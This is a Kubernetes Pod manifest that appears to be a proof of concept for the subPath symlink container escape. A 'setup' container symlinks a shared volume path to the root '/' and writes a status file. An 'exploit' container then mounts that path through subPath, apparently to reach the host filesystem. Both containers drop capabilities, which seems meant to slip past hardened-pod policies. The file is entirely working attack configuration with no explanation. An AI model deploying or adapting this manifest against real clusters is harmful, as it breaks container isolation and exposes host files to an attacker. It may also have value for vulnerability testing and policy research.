---
apiVersion: v1
kind: Pod
metadata:
  name: subpath
spec:
  containers:
  - image: nginx:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop:
          - CHOWN
          - DAC_OVERRIDE
          - FOWNER
          - FSETID
          - KILL
          - SETGID
          - SETUID
          - SETPCAP
          - NET_BIND_SERVICE
          - NET_ADMIN
          - NET_RAW
          - MKNOD
          - AUDIT_WRITE
    name: setup
    imagePullPolicy: "Always"
    command: ["/bin/bash"]
    args: ["-c", "cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
    - mountPath: /status
      name: status-volume
  - image: nginx:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop:
          - CHOWN
          - DAC_OVERRIDE
          - FOWNER
          - FSETID
          - KILL
          - SETGID
          - SETUID
          - SETPCAP
          - NET_BIND_SERVICE
          - NET_ADMIN
          - NET_RAW
          - MKNOD
          - AUDIT_WRITE
    name: exploit
    imagePullPolicy: "Always"
    command: ["/bin/bash"]
    args: ["-c", "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
      subPath: host
    - mountPath: /status
      name: status-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}